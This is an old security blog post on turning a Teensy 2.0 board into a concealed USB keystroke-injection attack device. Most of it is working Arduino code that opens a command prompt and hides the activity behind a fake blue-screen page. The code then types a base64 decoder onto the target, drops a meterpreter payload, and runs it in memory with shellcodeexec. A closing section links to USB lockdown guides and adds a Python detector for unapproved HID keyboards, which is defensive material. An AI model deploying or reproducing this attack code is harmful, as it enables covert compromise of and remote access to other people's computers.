Weaponizing the Teensy Slides

Thursday, September 15, 2011 Posted by Unknown 0 comments

Weaponizing the Teensy.

Monday, September 12, 2011 Posted by Unknown 0 comments
/* In progress this post will be updated a few times. */

A few friends and I have been playing around with the Teensy 2.0.

You can buy a Teensy from here: http://www.pjrc.com/teensy/

There have been a few write-ups regarding the Teensy being used as a pen-testing tool. This is more or less a collection of other people's ideas mixed in with a few of my own. I'll show you what you need, how to put it together, how to use it / how it works, and how to stop others from using it on you.

What you need:

Software:


Equipment list:


How to put it together:

Solder the double row of 5 header pins onto the Teensy board, then solder the MicroSD card reader to them.
I pushed my plastic headers together so the reader sat right on top of the Teensy's USB connector. This way, down the line, it will be easier to conceal. See pictures below:

Their way:
My way:



The Teensy is designed so that as soon as it gets power from the host it starts executing its program. To control which program runs when it powers up, you can fit your Teensy with switches. Others have used DIP switches for this; I am going to use mini rocker switches.


[pictures]
[diagrams]



How it works:

I don't know how else to explain my code, so I have my active code below, with an explanation of what each part is doing interleaved with it. Do not copy and paste from here. It WON'T work. Instead grab it from pastebin, which has minimal comments to save space.

Make sure you have all the software set up. Guide
How to program the Teensy. Basic usage guide

Format the microSD card (less than 2GB) using FAT. No file name on the SD card can be longer than 8 characters, not counting the file extension,
i.e. 8.3 file names (for example 12345678.abc).

The main thing is: if you can type it on a keyboard, you can do it with a Teensy. You just have to follow the same logic as if you were sitting at the computer.



code:

// idea from Social-Engineer Toolkit Tee Attack Vector
//
// Special thanks to: Irongeek
//
// Edited and adapted by INIT_6 nsfw & pl nsfw
// Getting payload from SD card instead of from a server.
//
// Lot of code was stolen from http://dabermania.blogspot.com/
// current msfpayload:  windows/meterpreter/bind_tcp  ← This is for testing only. Really should use a reverse_TCP
//
// ** SD card attached to SPI bus as follows: This is the same for all Teensy 2.0 boards; the ++ is different.
// ** MOSI - pin 2
// ** MISO - pin 3
// ** CLK - pin 1
// ** CS - pin 0

Global setup.
#include <SdFat.h>     // This library is needed to talk to the MicroSD card. Download here.
#include <Sd2Card.h>
#include <SdVolume.h>
#include <SdFile.h>
#include <phukdlib.h>  // IronGeek's function lib.

const int chipSelect = 0; // for Teensy 2.0: set the SPI bus chip select (CS) pin to 0 for the microSD card.
const int ledPin = 11;   // Teensy 2.0 has LED on 11

Setting up the variables for the libs above.
Sd2Card card;
SdVolume volume;
SdFile root;
SdFile file;

For testing only; once you have working code this should be deleted. It just outputs error messages to the serial console in the Arduino software.
// serial output steam
ArduinoOutStream cout(Serial);

// store error strings in flash
#define sdErrorMsg(msg) sdErrorMsg_P(PSTR(msg));
void sdErrorMsg_P(const char* str) {
  cout << pgm(str) << endl;
  if (card.errorCode()) {
    cout << pstr("SD errorCode: ");
    cout << hex << int(card.errorCode()) << endl;
    cout << pstr("SD errorData: ");
    cout << int(card.errorData()) << dec << endl;
  }
}
//----------------------------------------------------------------

void setup() runs only once, when power is applied. This is important: as soon as power is applied, this starts.
void setup(void){
  Serial.begin(9600);

  delay(3000); // delay to allow drivers to install. Time is in ms. 3sec works for all OSes except for Windows 7's first install, which is roughly 5 - 6 seconds. I believe if you change the keyboard vendorID to a Microsoft one this time can be cut down.

  // Initialize SdFat or print a detailed error message and halt
  // Use half speed like the native library.
  // change to SPI_FULL_SPEED for more performance.
  if (!card.init(SPI_HALF_SPEED, chipSelect)){
    sdErrorMsg("\ncard.init failed");
    return;
  }

  // initialize a FAT volume
  if (!volume.init(&card)){
    sdErrorMsg("\nvolume.init failed");
    return;
  }

  // open the root directory
  if (!root.openRoot(&volume)){
    sdErrorMsg("\nopenRoot failed");
    return;
  }
  // end SD setup.

  // Open cmd using the phukdlib.h lib
  CommandAtRunBarMSWIN("cmd.exe");
  // Delay for cmd to open
  delay(1000);
  // resize cmd window
  win_ResizeWindow();

  // delete any existing files named bsod.hta, decode.vbs and payload.txt. Fastest, easiest way to ensure that you won't have conflicts with existing files.

Keyboard.print("string") types the string out as if it were coming from a keyboard.
Notice the escape char '\'.

  Keyboard.print("del /f c:\\bsod.hta c:\\decode.vbs c:\\payload.txt");

PressAndRelease(key_code, Keycount); This is from IronGeek's lib, to save space and time.
  PressAndRelease(KEY_ENTER, 1);
  
  // open BSOD to hide all the non-sense.
  if (file.open(&root, "bsod.hta", O_READ)) {
    Serial.println("Opened bsod.hta");  
    }
  else{
    sdErrorMsg("\nfile.open failed");
  }
  
  // start copy con to place the BSOD on disk. Copy con is a great way to create scripts on disk: it creates a file and accepts keystrokes until you hit CTRL+Z and then Enter.
  Keyboard.print("copy con C:\\bsod.hta");
  PressAndRelease(KEY_ENTER, 1);

  // buffer: set b to a signed int, read to end of file, then print the char of the signed int b.

  int16_t b; // typedef signed int int16_t
  while ((b = file.read()) > 0) Keyboard.print((char)b);
As it reads in the file, as long as something can be read that is greater than 0 it will print that char.
  
  //ctrl-z then press enter to commit copy con changes
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  PressAndRelease(KEY_Z, 1);
  Keyboard.set_modifier(0);
  PressAndRelease(KEY_ENTER, 1);
  
  //close file.
  file.close();
  
  //Run the bsod.hta
  Keyboard.print("C:\\bsod.hta");
  PressAndRelease(KEY_ENTER, 1);
  
  //Move window off screen. More on functions like this below.
  win_MoveWindow();
  
  // open the file containing the decode VBScript on the SD card.
The long version of the program is located here: https://ghads.wordpress.com/2008/10/17/vbscript-readwrite-binary-encodedecode-base64/
Below is a very small, messy version of it. Basically, when you run it you give it a base64-encoded text file and the name of the executable to output it to. It reads the encoded file into a string, creates an XMLDOM element with its data type set to bin.base64, and writes the resulting bytes out to a file. It is really quick and slick.



//VBSScript file start//
Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject("Scripting.FileSystemObject"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub

//VBSScript file end//



  if (file.open(&root, "decode.txt", O_READ)) {
    Serial.println("Opened decode.txt");  
    }
  else{
    sdErrorMsg("\nfile.open failed");
  }
  // use echo to write the vbscript to c:\decode.vbs
  Keyboard.print("echo ");
  
  // buffer: set n to a signed int, read decode.txt to end of file, then print the char value of the signed int n.
  int16_t n;
  while ((n = file.read()) > 0) Keyboard.print((char)n);
  
  Keyboard.print(" > C:\\decode.vbs");
  PressAndRelease(KEY_ENTER, 1);
  
  //close file
  file.close();      
  
//Open and copy payload in base64 format to target.  
  if (file.open(&root, "payload.txt", O_READ)) {
    Serial.println("Opened payload.txt");  
    }
  else{
    sdErrorMsg("\nfile.open failed");
  }
  
  //start copy con to place the base64 encoded text
  Keyboard.print("copy con C:\\payload.txt");
  PressAndRelease(KEY_ENTER, 1);
  
  // buffer: set t to a signed int, read to end of file, then print the char of the signed int t. Same as before, just changing the variable names so they don't cross.
  int16_t t;
  while ((t = file.read()) > 0) Keyboard.print((char)t);
  
  //ctrl-z then press enter to commit copy con changes
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  PressAndRelease(KEY_Z, 1);
  Keyboard.set_modifier(0);
  
  PressAndRelease(KEY_ENTER, 1);
  
  //close file.
  file.close();


  // begin copy of memoryshellexec in base64 to target
  if (file.open(&root, "mexec.txt", O_READ)) {
    Serial.println("Opened mexec.txt");
  }
  else{
    sdErrorMsg("\nfile.open failed");
  }

  // start copy con to place the base64 encoded text
  Keyboard.print("copy con C:\\mexec.txt");
  PressAndRelease(KEY_ENTER, 1);

  // buffer: set q to a signed int, read to end of file, then print the char of the signed int q.
  int16_t q;
  while ((q = file.read()) > 0) Keyboard.print((char)q);

  // ctrl-z then press enter to commit copy con changes
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  PressAndRelease(KEY_Z, 1);
  Keyboard.set_modifier(0);
  PressAndRelease(KEY_ENTER, 1);

  // close file.
  file.close();

  // run the vbscript to convert mexec.txt to mexec.exe
  Keyboard.print("cscript C:\\decode.vbs C:\\mexec.txt C:\\mexec.exe");
  PressAndRelease(KEY_ENTER, 1);
  // run the vbscript to convert payload.txt to pwn.exe
  Keyboard.print("cscript C:\\decode.vbs C:\\payload.txt C:\\pwn.exe");
  PressAndRelease(KEY_ENTER, 1);

  // Run mexec.exe to execute the payload directly in memory. https://github.com/inquisb/shellcodeexec
  Keyboard.print("C:\\mexec.exe pwn.exe");
  PressAndRelease(KEY_ENTER, 1);


  // Turn the LED on for one second so you know it's complete.
  pinMode(ledPin, OUTPUT);
  digitalWrite(ledPin, HIGH);
  delay(1000);
  digitalWrite(ledPin, LOW);

}

void loop(void){}
As long as the Teensy has power it will loop through the code located in here. Not being used as of right now. When I implement the switches I will have all the code located in here.

An attempt to move the active window off screen.
void win_MoveWindow(){
int move = 0;
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("m");
while(move < 100) {
 delay(5);
 Keyboard.set_key1(KEY_UP);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 move++;
}
PressAndRelease(KEY_ENTER, 1);
}

An attempt to resize the active window.
void win_ResizeWindow(){
int move = 0;
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.print("s");
Keyboard.set_key1(KEY_LEFT);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_UP);
Keyboard.send_now();
Keyboard.set_key1(0);
Keyboard.send_now();
 while(move < 75) {
 delay(5);
 Keyboard.set_key1(KEY_RIGHT);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 Keyboard.set_key1(KEY_DOWN);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 move++;
}
PressAndRelease(KEY_ENTER, 1);
}



How to STOP IT:
IronGeek has spent a lot of time creating a wonderful document explaining how to prevent malicious USB devices. Please check out the following links.

http://www.irongeek.com/i.php?page=security/plug-and-prey-malicious-usb-devices
Linux environment: 3.2 Locking down Linux using UDEV

Windows environment: http://www.irongeek.com/i.php?page=security/locking-down-windows-vista-and-windows-7-against-malicious-usb-devices
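The links above cover prevention. As an added example that is not from the original post or from the tools it links, here is a small Python detector for the monitoring side on Linux: it reads kernel log lines (as printed by dmesg) and flags any keyboard-class HID interface whose vendor:product id is not on an administrator-maintained allowlist, noting when the same id also presents a mouse interface, which is the usual shape of a programmable HID board. The log lines, the ids and the allowlist are constructed for illustration, and the HID_LINE pattern assumes the shape of the kernel's hid-generic registration message.

```python
"""Flag USB keyboards that were not pre-approved, from Linux kernel (dmesg) lines.

Added example; not code from the original post or from the projects it links.
It assumes the shape of the kernel's hid-generic registration messages and an
allowlist of vendor:product ids recorded from the organisation's real keyboards.
"""
import re
from dataclasses import dataclass

# Constructed sample log lines (not captured from a real machine). The ids and
# names are illustrative: 046D:C31C stands in for an approved desk keyboard and
# 16C0:0487 for a microcontroller presenting itself as a composite HID device.
SAMPLE_KMSG = """\
[  903.000000] hid-generic 0003:046D:C31C.0001: input,hidraw0: USB HID v1.10 Keyboard [Logitech USB Keyboard] on usb-0000:00:14.0-1.1/input0
[ 1201.551210] usb 1-1.2: new full-speed USB device number 9 using xhci_hcd
[ 1201.660001] usb 1-1.2: New USB device found, idVendor=16c0, idProduct=0487
[ 1201.660010] usb 1-1.2: Product: Teensyduino Keyboard/Mouse/Joystick
[ 1201.700123] hid-generic 0003:16C0:0487.0005: input,hidraw2: USB HID v1.11 Keyboard [Teensyduino Keyboard/Mouse/Joystick] on usb-0000:00:14.0-1.2/input0
[ 1201.700456] hid-generic 0003:16C0:0487.0006: input,hidraw3: USB HID v1.11 Mouse [Teensyduino Keyboard/Mouse/Joystick] on usb-0000:00:14.0-1.2/input1
"""

# Vendor:product ids of keyboards the administrator has approved (constructed).
APPROVED_KEYBOARDS = frozenset({"046D:C31C"})

# One line per HID interface the kernel binds: bus type, VID:PID.instance,
# the boot-protocol kind (Keyboard/Mouse/Device), the product string, and the port.
HID_LINE = re.compile(
    r"hid-generic (?P<bus>[0-9A-F]{4}):(?P<vid>[0-9A-F]{4}):(?P<pid>[0-9A-F]{4})\.\d+: "
    r"input,hidraw\d+: USB HID v[\d.]+ (?P<kind>\w+) \[(?P<name>[^\]]*)\] on (?P<port>\S+)"
)


@dataclass(frozen=True)
class HidAlert:
    vid: str
    pid: str
    name: str
    port: str
    reason: str


def parse_hid_lines(log_text):
    """Return every hid-generic registration as a dict of the named groups."""
    return [m.groupdict() for line in log_text.splitlines() if (m := HID_LINE.search(line))]


def find_unexpected_keyboards(log_text, approved):
    """Alert once per VID:PID that registers a Keyboard interface and is not approved.

    If the same VID:PID also registers other interface kinds (e.g. Mouse), the
    alert says so, since a keyboard that is also a mouse is what a programmable
    HID board typically looks like to the host.
    """
    entries = parse_hid_lines(log_text)
    kinds_by_id = {}
    for e in entries:
        kinds_by_id.setdefault((e["vid"], e["pid"]), set()).add(e["kind"])

    alerts, seen = [], set()
    for e in entries:
        key = (e["vid"], e["pid"])
        if e["kind"] != "Keyboard" or f"{e['vid']}:{e['pid']}" in approved or key in seen:
            continue
        seen.add(key)
        others = sorted(kinds_by_id[key] - {"Keyboard"})
        reason = "keyboard not on allowlist"
        if others:
            reason += " (composite device also presents: " + ", ".join(others) + ")"
        alerts.append(HidAlert(e["vid"], e["pid"], e["name"], e["port"], reason))
    return alerts


if __name__ == "__main__":
    for a in find_unexpected_keyboards(SAMPLE_KMSG, APPROVED_KEYBOARDS):
        print(f"ALERT {a.vid}:{a.pid} '{a.name}' on {a.port}: {a.reason}")
```

On a real host you would feed it the output of dmesg (or journalctl -k) rather than the embedded sample, and populate APPROVED_KEYBOARDS from the keyboards you actually issue. This only reports; the udev lockdown in IronGeek's document linked above is the enforcement counterpart, and the two are complementary because an allowlist that is enforced silently still benefits from an alert when something is refused.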